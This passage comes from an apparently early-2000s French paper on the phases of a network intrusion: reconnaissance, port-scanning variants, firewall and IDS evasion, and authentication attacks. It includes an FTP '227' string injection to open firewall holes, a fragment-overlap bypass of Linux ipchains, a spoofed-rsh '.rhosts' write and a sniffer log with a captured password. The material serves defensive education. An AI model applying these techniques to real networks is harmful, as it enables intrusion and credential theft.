pirate dissimule ceci sous forme d.un e-mail de demande d.information et attend la réponse
légitime.

3.4 Moteurs de recherche
L.agresseur ne se limite pas aux seules informations techniques afin de préparer son attaque.
L.interrogation des moteurs de recherche Web classiques, tels qu.Altavista, Google, Yahoo, peut
révéler de nombreuses informations :
- noms d.employés, ayant par exemple postés dans des mailing-lists ou adresses IP
d.employés accédant à distance au réseau interne (VPN)
- liens hypertextes à partir d.autres sites vers le site cible
- communiqués de presse, détaillant des partenariats, rapprochements, .
D.autre part, des moteurs plus spécifiques comme DejaNews révèlent en plus potentiellement
des éléments techniques intéressants : l.analyse des en-têtes de messages envoyés sur Usenet
permet de déterminer le serveur de News utilisé par l.organisation cible, les versions des
logiciels clients utilisés, . Nous rejoignons ici la technique de « bounce » de découverte décrite
précédemment.

3.5 Outils réseaux de diagnostic
De nombreux outils de diagnostic réseaux permettent de recueillir des informations utiles pour la
phase d.identification de la cible. Ainsi, le programme traceroute fournit-il la liste de tous les
systèmes (routeurs) entre la source du traceroute et la machine destination. Ces données, à
recouper avec celles issues des registres, permettent de recadrer l.attaque vers un prestataire
vulnérable, afin par exemple de prendre le contrôle du tuyau utilisé par la cible. Traceroute et
ses dérivés laissent cependant des traces dans les systèmes de détection d.intrusion (ils
utilisent couramment des paquets UDP en incrémentant le numéro de port à chaque saut, la
réponse est un paquet ICMP), et les informations peuvent être obtenues par d.autres moyens
publics. Leur utilisation dans cette phase est donc superflue et risque d.alerter prématurément
les administrateurs de la victime.

3.6 Social-engineering
Même si dans les sociétés ayant déployé une politique de sécurité adéquat les tentatives de
social-engineering directes ont peu de chance d.aboutir, une demande d.information bénigne
auprès du service de support informatique est très souvent acceptée.
Notre agresseur, se faisant passer pour un utilisateur du système, peut ainsi demander les
adresses des proxy, des serveurs de messagerie internes, ou des serveurs Web internes, en
étoffant sa crédibilité grâce par exemple aux informations recueillies avec les méthodes vues
précédemment.

4. Scanning
La phase de recherche environnementale terminée, et la liste des cibles établies, le pirate va
s.employer à balayer le réseau cible afin d.en obtenir une topologie détaillée, aussi bien d.un
niveau réseau qu.applicatif. L.intérêt de cette phase, qui touche directement les systèmes cibles
et est donc la première partie décelable d.une tentative d.intrusion, est de trouver un ou
plusieurs systèmes « exploitables », c.est-à-dire qu.il sera facile au pirate de compromettre.

N.oublions pas aussi le caractère opportuniste d.une attaque : il suffit potentiellement d.une
seule vulnérabilité pour réussir une intrusion sur un système d.information ; c.est aussi la grande
différence avec le travail des administrateurs systèmes ou des équipes d.audit, qui doivent
identifier et corriger toutes les failles. Le pirate peut donc pour des raisons de furtivité arrêter
cette phase de scanning dès qu.il trouve un système vulnérable, le facteur chance est dans ce
cas prépondérant.

4.1 Rappel sur les protocoles TCP/IP
TCP/IP est la famille de protocoles utilisés pour le transport logique des données sur Internet, et
maintenant sur la plupart des réseaux locaux. Ses mécanismes, conçus il y a plus d.une
vingtaine d.années, ont été étudiés pour permettre une facilité d.implémentation et d.utilisation,
et souffrent de nombreux problèmes de sécurités inhérents.

4.1.1 IP
Rappelons les formats des paquets IP. IP est le protocole correspondant à la couche
« Réseau » du modèle OSI (bien qu.IP soit antérieur à ce modèle). C.est donc IP qui s.occupe
de la notion d.adressage, ici sous forme d.adresse IP sous 4 octets, souvent représentées par la
notation quadruplet a.b.c.d . IP est responsable du routage des paquets de leur source à la
destination ; un routage adaptable au vol est d.ailleurs une des problématiques à l.origine
d.Arpa, le précurseur d.Internet. IP s.occupe aussi de la fragmentation des paquets, c.est-à-dire
leur découpage en plus petits paquets afin de s.adapter aux contraintes des couches inférieures
(physiques). La taille maximum des données que peut véhiculer un support physique donné est
exprimée par son MTU (Maximum Transmit Unit) . IP découpe donc les données
(fragmentation) pour les adapter au MTU du lien dans le cas d.une transmission, et les regroupe
(défragmentation) avant de les remonter aux couches supérieures dans le cas d.une réception
de paquet. Finalement, IP veille à ce qu.il n.y ait pas de bouclages de paquets, ou de paquets
éternels en attribuant à chacun un Time-to-Live (durée de vie), qui donne le nombre d.interfaces
(ou de systèmes, suivant les implémentations) que le paquet peut traverser avant d.être détruit.
Une telle destruction de paquet, lorsque son TTL arrive à 0, génère un message ICMP « Time
Exceeded in Transit » qui est renvoyé à l.émetteur du paquet.

Les paquets IP sont constitués de la façon suivante :
(bits)
0 4 8 12 16 18 20 24 28 31
Version IHL Type de service Longueur totale
Identification Flags Offset
TTL Protocole Checksum en-tête
Adresse source
Adresse destination
Options (si présentes) Padding
Données …
(par exemple, paquet TCP ou UDP)
En-tête IP
(IP header)

Flags :
IP_RF 0x8000 reserved fragment flag
IP_DF 0x4000 dont fragment flag
IP_MF 0x2000 more fragments flag
IP_OFFMASK 0x1fff mask for fragmenting bits

Les données véhiculées par un paquet IP ne sont pas des données brutes de communication
d.applications, mais des données d.autres protocoles comme TCP ou UDP, dit de transport,
encapsulées dans le paquet IP. C.est le principe fondamental de l.encapsulation/décapsulation
du modèle en couches. Chaque couche rajoute ses données de contrôle dans une en-tête qui lui
est propre, les données véhiculées (qui contiennent elles-mêmes des en-têtes) lui sont
complètement opaques.

4.1.2 TCP
TCP est le protocole IP correspondant au protocole connecté du modèle OSI. TCP s.occupe
donc d.assurer un transport fiable d.un service source à un service destination, identifiés tous
deux par un numéro dit numéro de port (entre 0 et 65535), en établissant une connexion logique
et une vérification de transmission des données, avec retransmission en cas d.erreur (PAR,
Positive Acknowledgment with Retransmission).

L.établissement d.une connexion TCP s.effectue par un mécanisme dit de 3-way handshake.
La machine source A désirant établir une connexion envoie un paquet TCP contenant le flag
SYN et un numéro de séquence SN=x. La machine recevant la connexion B l.accepte ou non,
suivant qu.il y ait ou non un processus prêt à répondre à la demande sur le port destination de la
connexion. Dans le cas positif, B répond par SYN ACK, SN=y, et AN=x 1 (numéro
d.acquittement). Sinon, A répond par un paquet contenant le flag d.interruption brutale RST.
Lorsque A reçoit le paquet SYN ACK, A émet un paquet contenant le flag ACK et un
acquittement AN=y 1. La connexion est alors établie, le transfert des données peut alors
commencer. Les acquittements suivants doivent être effectués pour tous les octets transférés.
Format d’un paquet TCP
bits
0 4 8 12 16 20 24 28 31
Port source Port destination
Numéro de séquence
Numéro d’acknowledgment
Offset Reservé Flags Window
Checksum Pointeur urgent
Options Padding
Données
Flags :
TH_SYN 0x02 Bit de Synchronisation
TH_RST 0x04 Réinitialisation (Reset), interruption brutale de connexion
TH_PUSH 0x08 Force le ‘push’ (délivre les données à l’application)
TH_ACK 0x10 Acknowledgment
TH_URG 0x20 Données urgentes
4.1.3 UDP
UDP est le protocole sans connexion de la famille IP. Comme dans TCP, une notion de port4
source et de port destination est utilisée pour multiplexer/démultiplexer les transferts de données

4 il est à noter qu.un port UDP n.a aucune relation avec un port TCP, même si les deux couvrent la même
notion.

entre les applications d.émission et de réception. Dans le cas d.UDP, aucun établissement de
connexion préliminaire n.est effectué, et aucun contrôle du transfert n.est directement assuré.
Dans le cas de l.envoi d.un paquet vers un port non bindé5, c.est-à-dire un port sur lequel
aucune application n.écoute, un message ICMP « Port Unreachable » est renvoyé à
l.expéditeur.

4.2 Recherche des machines actives : scan ICMP et TCP
Le pirate balaie les adresses IP trouvées dans la phase d.identification et, par adresse, envoie
un packet ICMP « Echo Request ». Les machines actives (up) répondent par un paquet ICMP
« Echo Reply ».
Le protocole de messages et diagnostics ICMP est cependant souvent filtré, en raison des
nombreuses fonctionnalités risquées qu.il présente (par exemple, ICMP « Redirect » permettant
de reconfigurer une route). L.agresseur peut donc utiliser en alternative une méthode dite de
ACK-scan. Il envoie un paquet TCP vers un service quelconque, contenant le bit ACK
positionné dans les flags. Ce paquet ne correspondant à aucune connexion établie, la machine
distante, si elle est active, répond par un paquet TCP contenant le flag RST de réinitialisation de
connexion.
Etant donné que certains filtres IP (firewalls) annoncent le refus des paquets par un message
ICMP, le scan ICMP permet donc aussi de faire une découverte rudimentaire des règles de
filtrage IP.

4.3 Port scanning TCP et UDP
L.idée de ce type de scan, le plus important et le plus répandu, est d.obtenir la liste des services
en écoute sur les machines distantes. Ces services sont susceptibles d.être fournis par des
applicatifs contenant des bugs de sécurité, tels que les bugs d.implémentation que nous
décrirons dans la phase suivante.
L.agresseur envoie donc, par IP (active) et par port intéressant, des paquets qui, suivant la
réponse qu.ils génèrent, permettront de dire si le port est ouvert (en écoute) ou non.
L.envoi d.un paquet vers un port donné est appelé probe vers ce port.

La découverte et la publication d.un bug sur telle ou telle application serveur publique, comme
récemment en janvier 2001 le serveur de noms DNS bind d.ISC entraîne très souvent des
milliers de scans de pirates pour les ports correspondants aux applicatifs incriminés, le port 53
(TCP et UDP) dans le cas de bind. Les ports scannés sont donc principalement les ports
associés à des services contenant des vulnérabilités connues, et non des ports libres. En
particulier, les scans visent la plupart du temps les ports inférieurs à 1024, historiquement
réservés aux services publics tels que DNS (53, en TCP et UDP), http (80 en TCP), portmap
(111 en TCP), POP3 (110 en TCP).

Le scanning de ports étant assez bruyant au niveau des enregistrements (logs) des firewalls ou
des systèmes de détection d.intrusion, de nombreuses variations existent pour assurer la
furtivité des scans. Nous distinguons en particulier :

4.3.1.1 TCP connect scan
Ce type de scan, le plus simple à implémenter car il ne nécessite aucune manipulation de
paquet, tente d.établir une connexion légitime avec le port visé de la machine distante. C.est
aussi le scan le plus visible.

5 venant de la primitive C bind() de l.API des sockets BSD, qui permet de « nommer » une socket et donc
de s.attacher à un port donner dans le cas TCP/UDP.


4.3.1.2 UDP scan
L.unique technique de scanning UDP consiste à envoyer un paquet au port UDP visé et attendre
un éventuel message de réponse ICMP « Port Unreachable ». Si ce message est reçu, le port
est fermé ou filtré. Cependant, le scan UDP est peu fiable car il est nécessaire que l.ICMP soit
autorisé en sortie. D.autre part, de nombreuses stacks IP empêchent l.envoi trop rapide de
réponses ICMP (au maximum 80 messages toutes les 4 secondes sous Linux par exemple,
technique dite de throttle).

4.3.1.3 TCP SYN Scan
Le SYN Scan consiste à réaliser seulement une partie du 3-way handshake de l.établissement
d.une connexion TCP, d.où son autre nom de half-open scan. L.agresseur envoie un paquet
contenant le flag SYN au port à tester de la machine cible. Si celle-ci répond par un paquet
contenant les flags SYN ACK, alors le port est ouvert et un service y est disponible. Sinon (cas
où la cible répond par RST), le port est fermé. Une fois l.état du port déterminé par la réponse de
la cible, l.agresseur ne finalise pas l.établissement de la connexion par un ACK mais détruit la
connexion au moyen d.un RST. La connexion n.apparaît donc pas dans les logs des services de
surveillance orientés connexion, tels que les tcpwrappers. Un tel scan est par contre détectable
assez facilement par un système de détection d.intrusion en surveillant les paquets SYN.

4.3.1.4 TCP FIN Scan, NULL Scan, XMAS Scan6
D.après le RFC 793, la couche TCP/IP d.un système d.exploitation doit répondre par RST à tout
paquet adressé à un port fermé, tandis qu.elle doit ignorer et ne pas répondre aux paquets non
SYN adressés aux ports ouverts. L.idée des scans FIN, NULL et XMAS est d.utiliser des
paquets contenant respectivement le flag FIN, aucun flag, les flags FIN URG et PUSH pour
vérifier cette condition. Cependant quelques systèmes ne suivent pas les spécifications posées
dans le RFC, et ces scans s.avèrent inopérants sur les plate-formes Microsoft (Windows NT et
9x), Cisco IOS, BSDI, HP/UX, SGI Irix.
Ce type de scan est très difficile à détecter pour un IDS réseau, car il lui faudrait mémoriser
toutes les connexions afin de déterminer si le FIN correspond à une connexion réellement
établie ou non. Les IDS réseau reconnaissent les scans FIN en remarquant les rafales de
paquets FIN vers différents ports en un laps de temps très courts. Insérer un délai suffisant entre
les probes permet d.éviter la détection de ces scans.

4.3.1.5 FTP bounce scanning
Le protocole FTP pose une communication à deux canaux pour le transfert de fichiers: une
communication vers le port TCP 21 du serveur est établie par le client et sert de canal pour les
commandes, un autre canal est établi à partir du port source 20 vers un port libre aléatoire côté
client pour le transfert des données (listing des fichiers, envoi ou réception de fichiers)
proprement dites.
Ce mécanisme, outre les autres failles inhérentes de FTP (à savoir, passage en clair des
identifiants et mots de passe), présente un risque de sécurité important car l.IP et le port vers
lesquels le serveur effectuera la connexion de retour pour l.envoi des données sont spécifiés par
le client, au moyen d.une commande PORT x,x,x,x,y,y (où x,x,x,x est l.adresse IP, octets
séparés par des virgules et y,y sont les deux octets du numéro de port). Le client est donc libre
de spécifier n.importe quelle IP et n.importe quel port. Si aucune vérification n.est effectuée côté
serveur, celui-ci ira établir une connexion vers une machine tiers. Un agresseur peut ainsi
effectuer un scan de ports au moyen de la commande PORT, répétée autant de fois que

6 Description précise dans le manuel du scanner de ports nmap par Fyodor, http://www.insecure.org/


nécessaire. Les messages d.erreurs renvoyés par le serveur FTP indiquent que le port spécifié
n.est pas ouvert ou est filtré. Un transfert effectué sans erreur indique au contraire que le port
est ouvert.
Même si la plupart des implémentations actuelles de serveurs FTP interdisent de telles
commandes PORT, de nombreuses machines sur Internet contiennent encore des serveurs FTP
affectés qui peuvent servir de relais pour des scans, sans même que l.agresseur ait besoin d.en
prendre le contrôle (en se connectant au serveur en ftp anonyme, par exemple). En effet, la
machine source du scan sera vue par la cible comme étant le serveur FTP. D.autre part, dans le
cas de réseaux protégés par un filtre, la présence d.un serveur FTP vulnérable à une telle
attaque peut être utilisée pour passer le filtre avec les règles relatives à la machine hébergeant
le serveur FTP.

4.3.2 Techniques avancées de scanning
Voyons ici quelques techniques mettant en défaut certains filtres IP (firewalls) et IDS.

4.3.2.1 Ports sources spéciaux
Comme nous venons de voir, le protocole FTP s.attend à ce que toute communication de
données soit faite avec comme port source au niveau serveur le port 20, et comme destination
un port quelconque côté client. Ceci est souvent pris en compte dans les règles de firewall en
incluant une règle, extrêmement dangereuse, acceptant toute connexion entrante sur le réseau
dont le port source est 20. Ce type de règle est à proscrire; il est très facile de choisir le port
source d.une connexion et un firewall arborant une telle règle est équivalent à pas de firewall au
niveau TCP. Des outils7 permettent même de positionner le port source de n.importe quelle
connexion à une valeur donnée, sans besoin de modifier les logiciels eux-mêmes.
Un autre port source souvent accepté en entrée, cette fois-ci pour UDP, est le port 53, qui
correspond à la source d.une requête DNS. De nombreuses configurations de firewalls incluent
par facilité des règles telles que « accepter tout paquet vers notre serveur DNS ayant comme
port source 53 », exposant ainsi le serveur entier à des attaques sur des services UDP autres
que DNS.

4.3.2.2 Rebonds au travers de proxies applicatifs
De nombreuses organisations disposent de proxies applicatifs dans des buts de sécurité (socks,
firewalls applicatifs tels que NAI Gauntlet) ou d.optimisation du trafic Internet (proxy-cache http).
Ces proxies, lorsqu.ils sont mal configurés, peuvent servir de rebonds à un utilisateur extérieur
pour attaquer le réseau interne ou un autre réseau de façon anonyme. Les proxies les plus
recherchés par les pirates sont les proxies http8 et Wingate, souvent utilisables sans
authentification.

4.3.2.3 Fragmentation IP
Une des fonctionnalités rendues par IP est la fragmentation des paquets pour les adapter aux
contraintes de taille du support physique, le lien. Ainsi, il est possible de découper les paquets
de telle façon que les informations nécessaires au firewall pour décider de l.acceptation ou non
du paquet soient distribuées sur plusieurs fragments, en coupant par exemple l.en-tête TCP en
deux. Les alternatives possibles pour le firewall sont alors l.acceptation/le refus sans examen du
paquet ou l.attente des autres fragments pour pouvoir défragmenter le paquet et ainsi disposer
de l.en-tête complet pour faire la décision de passage. Dans de nombreux cas (en particulier
dans les filtres IP simples des routeurs, sur les réseaux à grand débit), le coût de cette

7 nmap (http://www.insecure.org/) et ADMfzap (ftp://adm.freelsd.net/pub/ADM/)
8 Les caches http tels que Microsoft Proxy Server, Squid, permettent aussi d.émettre des connexions non
http, notamment au moyen des méthodes POST et CONNECT.

défragmentation est trop important et seuls les fragments d.offset 0 (censés contenir les
informations de décision) sont inspectés, les autres sont par défaut acceptés.

4.3.2.4 Sémantique des fragments spéciaux
L.offset des fragments est en fait le rang (offset) du premier octet de données du fragment dans
le paquet final réassemblé :
En jouant sur l.offset, nous pouvons créer des fragments chevauchant les précédents et
réécrivant des données d.autres fragments, telles que les en-têtes TCP ou UDP contenues dans
le paquet IP. Comme précédemment, le filtre doit disposer de l.intégralité des fragments pour
pouvoir appliquer les règles au paquet. De plus, le filtre ne sait pas à priori comment va réagir la
machine destination à cette réécriture des paquets par fragments se chevauchant : ce
comportement dépend en effet de la stack IP de la machine distante, et quasiment tous les cas
existent (réécriture des données en se conformant aux derniers fragments reçus, abandon des
fragments se chevauchant, abandon pur et simple du paquet, .). Ce problème appartient à une
classe plus importante dite de sémantique de la stack IP (impossibilité de prévoir la réaction de
la stack IP à certains stimuli, sans en connaître l.implémentation), et a été popularisé comme
moyen de contourner certains IDS et filtres IP. Des outils9 sont disponibles pour implémenter
ces attaques.

4.3.2.5 Bugs des stacks IP ou de firewalling, exemples

Linux IPCHAINS10
La couche de firewalling des noyaux Linux < 2.2.11 contient un bug découvert en juillet 1999 par
Thomas Lopatic de Data Protect AG, permettant, sous certaines conditions, de procéder à la
réécriture du port dans l.en-tête TCP ou UDP du paquet. Il est ainsi possible de faire accepter
toute connexion vers un port arbitraire d.une machine protégée par un firewall Linux affecté et
pour laquelle il existe au moins un port non filtré. La vulnérabilité est dans le fait que le noyau
considère un fragment d.offset égal à 0 trop petit pour contenir toute l.en-tête de transport (TCP
ou UDP) comme un fragment d.offset supérieur à 0.

Le scénario d.attaque est alors le suivant :

9 Fragrouter, http://www.anzen.com/research/nidsbench/
10 http://www.dataprotect.com/ipchains/

En-tête IP (0)
A
B
C
D
0
20
40
60
20
80
Offset de
fragmentation
En-tête IP (0)
A
En-tête IP (20)
B
En-tête IP (40)
C
En-tête IP (60)
D
20
20

1. L.agresseur lance un fragment vers la machine protégée contenant le flag IP_MF, un
offset de 0 et une en-tête TCP avec un port non filtré,
2. Il lance ensuite un fragment d.offset 0 d.une longueur de 4 octets, contenant le port filtré
à contacter. En vertu du bug, ce fragment sera traité comme un fragment d.offset
supérieur à 0 et les données viendront recouvrir le port non filtré du premier fragment.
3. Il termine le paquet par un fragment sans flag IP_MF et contenant le reste des données
du paquet.

Inspection des réponses de serveurs FTP protégés
Afin de permettre à des clients externes de se connecter à un serveur FTP protégé par un
firewall, de nombreux firewalls proposent une solution d.inspection du contenu de chaque
paquet de réponse du serveur. Lorsqu.un tel paquet commence par la chaîne .227 .
(correspondant à une acceptation de la commande PASV d.ouverture d.un canal de données
symétrique à la commande PORT), le firewall extrait l.adresse IP et le numéro de port spécifié
dans ce paquet et ouvre un « trou » temporaire dans le firewall pour laisser passer cette
connexion du client vers l.adresse en question, normalement le serveur FTP lui-même. En
forçant le serveur FTP à répondre par une chaîne .227 . adéquate, il est possible d.ouvrir une
connexion TCP vers n.importe quel port de n.importe quelle machine protégée. Cette réponse
peut être obtenue en envoyant une commande similaire à .xxx227 Entering Passive Mode
(192,168,1,10,192,3). où a,b,c,d est l.adresse IP de la cible et e,f le port désiré. Le serveur
répondra par un message d.erreur similaire à : « Unknown command : xxx227 Entering Passive
Mode (192,168,1,10,192,3) ». En jouant sur l.option MSS de la connexion TCP, qui spécifie la
taille maximum des segments de données transmis, il est facile de couper le flux pour que 227
soit au début d.un paquet.
De nombreux firewalls IP sont affectés par cette vulnérabilité, découverte en février 2000 par
John Mc Donald de Data Protect AG11 : Checkpoint FW1 4.0 et 3.0, Cisco PIX 5.0 et 4.x, Linux
ipchains, .

4.3.3 Autres techniques de découverte de la topologie
4.3.3.1 Détection des systèmes d.exploitation
Le nombre de stacks IP actuellement disponibles implique autant de comportements différents
pour le traitement des paquets spéciaux, des erreurs, . Cette constatation est la base de
l.identification distante des systèmes d.exploitation, compte tenu de leurs réactions à certains
paquets de test : réaction à l.envoi d.un paquet FIN (Microsoft Windows répond par RST alors
que le RFC 793 recommande de ne pas répondre), incrément des numéros de séquences
initiaux, .
La granularité obtenue actuellement dans certains scanners est importante, allant même jusqu.à
l.identification des patchs installés en plus de la version du système d.exploitation.

4.3.3.2 Firewalking
Cette technique, dérivée de traceroute, consiste à envoyer des paquets IP dont on incrémente
successivement le TTL. Les réponses reçues nous donnent toutes les passerelles entre notre
source et la machine destination. Le firewalking consiste aussi à faire varier les protocoles
véhiculés par les paquets IP de test pour être par exemple acceptés par un firewall, la décision
d.acceptation se faisant souvent sur le protocole de transport (TCP ou UDP vers le port donné
d.une IP donnée).

11http://www.dataprotect.com/,
http://www.securityfocus.com/frames/?content=/vdb/bottom.html?vid=979


Le pirate est ainsi capable d.obtenir une cartographie précise d.une zone protégée par un
firewall, et de déterminer les règles d.accès de ce firewall.

4.3.3.3 Analyse applicative des ports ouverts
Afin d.optimiser les chances de succès de l.intrusion, l.agresseur détermine les versions précises
des services ouverts qu.il a pu trouver grâce au scanning. Pour se faire, il corrèle les résultats de
la découverte du système d.exploitation (méthodes précédentes) avec des analyses niveau
application des bannières présentes sur les ports ouverts.
En effet, les services répondent souvent aux clients qui se connectent par une bannière
d.identification, donnant type et version du service.
Par exemple, la connexion au port 21 d.une machine donne le résultat suivant :

[root@secway /] telnet alyssa 21
Trying 192.168.1.18...
Connected to alyssa.
Escape character is '^]'.
220 alyssa FTP server (SunOS 4.1) ready.

La bannière affichée indique non seulement un serveur FTP, mais aussi la version du système
d.exploitation (ici, une machine Sparc SunOS 4.1).

De la même manière, si aucune bannière n.est affichée, nous pouvons déduire ces informations
de la réponse du serveur à une requête classique.

[root@secway /]# telnet hera 8123
Trying 192.168.1.14...
Connected to hera.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 06 Mar 2001 18:02:21 GMT
Server: Apache/1.3.12 Ben-SSL/1.40 (Unix) PHP/4.0.1pl2 FrontPage/4.0.4.3
Last-Modified: Mon, 20 Sep 1999 15:25:36 GMT
ETag: "555cf-f08-37e651f0"
Accept-Ranges: bytes
Content-Length: 3848
Connection: close
!content-type:! text/html

Le port 8123 du serveur hera est dans ce cas un serveur Web Apache 1.3.12 sur une machine
Unix. Il dispose de plus des extensions Frontpage et SSL.

La technique de mail-bounce décrite dans la phase de recherche environnementale peut aussi
être reprise pour obtenir les versions des serveurs Mail utilisés.

Certains services ont pour fonction première de fournir des informations. C.est le cas de SNMP,
finger. Un agresseur peut obtenir des MIB standards d.un serveur SNMP (souvent accessibles
en lecture seule avec des noms de communautés par défaut tels que « public », « cisco ») des
données comme : le nombre et la nature des interfaces réseaux de l.équipement, la version du
système, le nombre d.utilisateurs connectés, les adresses ARP des cartes, .

5. Exploitation
Le pirate a collecté suffisamment d.information pour être capable de déterminer le point le plus
faible du réseau, celui sur lequel l.attaque sera la plus discrète et la plus optimale possible.
La phase d.exploitation est le tournant de l.intrusion, celle à partir de laquelle l.agresseur ne peut
plus reculer : autant la phase de scanning peut-elle être considérée comme une simple
« recherche d.information », l.exploitation montre un engagement de l.agresseur dans une action
offensive hostile.
Cette phase est généralement très brève car elle se résume à l.utilisation d.un bug pour prendre
le contrôle d.un système. Le pirate passe ensuite dans une phase de progression si le système
compromis lui convient (d.un point de vue emplacement par exemple) pour mener à bien son
intrusion, ou sinon recommence la phase d.exploitation sur un autre système : c.est dans cette
phase que le caractère opportuniste de l.attaque dont nous avons parlé précédemment est le
mieux mis en lumière.

Détaillons maintenant les principales méthodes pour gagner l.accès à un système cible. Ces
attaques peuvent être menées contre des services filtrés en utilisant les mêmes techniques de
contournement que celles vues précédemment pour le scanning.

5.1 Classe des attaques par usurpation d.identité
L.authentification, en tant que reconnaissance fiable d.un utilisateur par certains critères secrets
tels que les mots de passe, est la principale défense pour protéger l.accès à un système. C.est
donc aussi la porte d.entrée la plus souvent forcée, les systèmes d.authentification déployés
actuellement utilisant des concepts beaucoup trop faibles pour les techniques d.attaques
modernes.

5.1.1 Découverte d.informations d.authentification par essais
La technique la plus classique d.usurpation d.identité est celle dite de « brute force » des
informations d.authentification d.utilisateurs donnés. Le pirate essaie des combinaisons de
logins/mots de passe (dans le cas d.un système d.authentification par mot de passe) jusqu.à
trouver un couple valide. Cette méthode, certaine mais délicate car facilement identifiable et
potentiellement très longue, peut être facilitée par de nombreux moyens : les informations
découvertes dans la phase d.identification de la cible ou de scanning, telles que les noms
d.utilisateurs ou e-mails internes valides peuvent par exemple donner des logins valides. Les
mots de passe à essayer sont tirés d.un dictionnaire, dérivés du login ou dérivés de dictionnaires
adaptés (par exemple bâtis à partir de tous les mots présents sur le site Web de la cible).

5.1.2 Abus de relations de confiance
Un système d.information est inévitablement construit autour de relations de confiance qu.ont les
différents éléments entre eux. Typiquement, un serveur d.authentification centralisé est par
excellence l.élément de confiance (on dit « trusté ») du système d.information. Il a été
historiquement très commun d.établir des relations de confiance entre machines pour les
authentifications auprès de services comme les r- services BSD (rlogin/rsh/rexec). De même,
l.authentification auprès de NFS est faite par la machine client : pouvoir changer son identifiant
Unix sur la machine client revient à pouvoir accéder aux fichiers NFS des autres utilisateurs, le
contrôle de l.UID étant effectué côté client.

Nous mettons ainsi en évidence une méthode d.usurpation d.identité mettant en jeu les relations
de confiance entre machines. L.exemple le plus connu12 de ce type d.attaques est celui du TCP
Spoofing contre les serveurs rsh. Les serveurs rsh permettent une authentification par relations
de confiance entre machines sur le modèle suivant : un client situé sur une machine A peut
accéder sans demande de mot de passe à la machine serveur rsh B si celle-ci contient un fichier
de configuration ($HOME/.rhosts) établissant une relation de confiance avec A. rsh étant
implémenté au dessus de TCP, qui se charge de la négociation d.une véritable connexion
logique entre les deux machines, ceci n.aurait pas été un véritable problème sans certains
défauts de conception des stacks IP en ce qui concerne la génération des numéros de
séquence initiaux (ISN) TCP.
Rappelons que la machine B, en réponse à une demande de connexion de A, renvoie à A un
paquet contenant un acquittement du numéro de séquence envoyé par A, ainsi qu.un autre
numéro de séquence y, supposé aléatoire. A va alors répondre en acquittant y, et la connexion
est ainsi établie. Dans le cas normal, le fait que seul A connaît le numéro de séquence y
retourné par B garanti que c.est bien A à l.autre bout du flux. Cependant, la quasi-totalité des
stacks IP d.il y a une dizaine d.années incrémentaient les ISN par pas de 64k. Il était donc facile
d.immobiliser A pour ne pas qu.elle réponde (déni de service sur A), de prévoir le numéro y
retourné par B, l.acquitter à la place de A et ainsi établir une connexion fictive « à l.aveugle »
entre A et B. Le pirate exécute par ce biais des commandes telles que echo >> ~/.rhosts
lui permettant d.accéder à la cible par rsh, directement de sa machine d.attaque.
Des attaques similaires sont possibles sur NFS, encore plus faciles au niveau transport car le
protocole utilisé est UDP (donc pas d.établissement de connexion logique). Le pirate réalise une
opération de montage fictive du partage NFS visé vers un système trusté non actif, ouvre un
fichier (par exemple un ~/.rhosts) et y écrit ce qu.il souhaite. Dans ce cas, le seul facteur à
maîtriser est le filehandle NFS (numéro de fichier NFS attribué aléatoirement à l.ouverture du
fichier).
Finalement, bien que cela soit fortement déconseillé, DNS est souvent utilisé pour la
construction de relations de confiance : au lieu de préciser l.adresse IP, seul identifiant unique
d.une machine, il est fréquent d.utiliser le nom DNS de la machine trustée. De la même manière,
la compromission du serveur DNS (compromission directe ou pollution des caches DNS,
prédiction des identifiants de requêtes) entraîne la compromission de l.autre serveur.

5.1.3 Interception d'informations d'authentification
Nous avons vu que toute machine « proche » topologiquement de la cible est elle-même une
cible potentiellement intéressante. En effet, prendre le contrôle d.une des machines du
prestataire Internet permet par exemple d.inspecter le trafic réseau de l.organisation, de
l.enregistrer et souvent d.intercepter des informations d.authentification (mots de passe) circulant
en clair sur le réseau.
Même si la mode est au chiffrement des données pour leur assurer confidentialité et intégrité, de
nombreux protocoles véhiculent toujours leurs données, dont l.authentification, en clair. C.est le
cas des services de récupération de courrier POP, IMAP, des services FTP, telnet, rlogin et de
nombreux autres.
De nombreux outils, appelés sniffers, sont disponibles pour capturer du trafic réseau à des fins
d.analyse et de diagnostic. Certains sont spécifiquement écrits pour capturer des mots de
passe : pcs13, dsniff14. Ces sniffers dédiés aux pirates peuvent être équipés de fonctionnalités
évoluées comme le chiffrement des données capturées, le renvoi en temps réel de ces données
vers d.autres serveurs, ..

12 car popularisé par le fameux pirate Kevin Mitnick.
13 PCS par Halflife, http://packetstorm.securify.com/Exploit_Code_Archive/pcs.tgz
14 DSNIFF par Dug Song, http://www.m!onkey!.org/~dugsong/dsniff/

L.exemple suivant montre un fichier produit par le sniffer pcs. On remarque qu.une connexion ftp
entre les machines intra et gaia a été interceptée et enregistrée. Nous pouvons y voir le login
(bob) et le mot de passe (m0nP4sS) de l.utilisateur qui s.est connecté.

---
PATH: intra.Secway-int.net(2611) => gaia.Secway-int.net(ftp)
DATE: Wed Mar 7 03:55:25 2001
USER bob
PASS m0nP4sS
SYST
PASV
LIST
CWD /tmp
PASV
LIST
QUIT
[CLOSED]

La démocratisation des solutions de chiffrement telles que SSH (remplacement de telnet) ou
SSL (http et beaucoup d.autres protocoles) a poussé les pirates a trouver des attaques plus
subtiles pour intercepter les informations d.authentification.
Aussi, l.attaque la plus fréquente15 dans le cadre de l.interception de données chiffrées est
l.attaque dite man-in-the-middle. Nombre de solutions de chiffrement telles que SSH ou SSL
reposent sur un chiffrement asymétrique, à base de clef publique/clef privée pour échanger une
clef symétrique dite de session. Un client A qui souhaite se connecter au serveur B lui envoie sa
clef publique, et réciproquement. Un pirate s.étant introduit entre A et B peut intercepter la
connexion, se faire passer pour B et envoyer sa propre clef publique à A. Celui-ci dialoguera
avec le pirate, pensant dialoguer avec B. En retour, le pirate dialoguera avec B et enverra les
réponses de B à A. Cette attaque est possible si l.utilisateur ne vérifie pas que la clef publique
qu.il a reçue est bien celle de B (cette distribution et certification des clefs est la problématique
que tentent de régler les PKI).

5.1.4 Détournement de flux existants
Une variation de l.attaque précédente consiste à se placer sur le chemin d.une connexion entre
A et B et y insérer des données qui seront reconnues comme valides venant de l.autre par la
machine qui les reçoit. Cette possibilité est cependant subordonnée à une vulnérabilité dans le
système de chiffrement et de vérification, telle que celle découverte en 1998 dans SSH16.
Cette méthode est évidemment aussi applicable, et encore plus facilement, aux flux non chiffrés
grâce à des outils comme Hunt17.
Le pirate a même la possibilité de prendre le contrôle complet du flux existant, par une
